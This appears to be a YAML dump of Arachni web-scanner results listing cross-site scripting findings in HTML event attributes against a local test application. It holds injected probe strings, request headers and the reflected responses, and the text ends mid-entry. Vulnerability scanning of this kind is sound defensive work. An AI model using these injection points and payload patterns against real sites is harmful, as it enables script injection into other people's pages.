        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onmousemove
      :id: <a href="/" onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousemove=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousemove</a><a href='/' onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a><a href='/' onmousemove='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousemove</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onmousemove
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onmouseout
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onmouseout
      :id: <a href="/" onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseout=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseout</a><a href='/' onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a><a href='/' onmouseout='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseout</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onmouseout
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onmouseover
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onmouseover
      :id: <a href="/" onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseover=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseover</a><a href='/' onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a><a href='/' onmouseover='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseover</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onmouseover
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onmouseup
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "421"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onmouseup
      :id: <a href="/" onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseup=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseup</a><a href='/' onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a><a href='/' onmouseup='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onmouseup
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/src
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "385"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/src
      :id: <a href="/" src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' src=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>src</a><a href='/' src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a><a href='/' src='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>src</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/src
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onload?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "403"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onload?input=default
      :id: <a href="/" onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onload=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onload</a><a href='/' onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a><a href='/' onload='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onload?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onunload?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onunload?input=default
      :id: <a href="/" onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onunload=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onunload</a><a href='/' onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a><a href='/' onunload='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onunload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onunload?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onblur?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "403"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
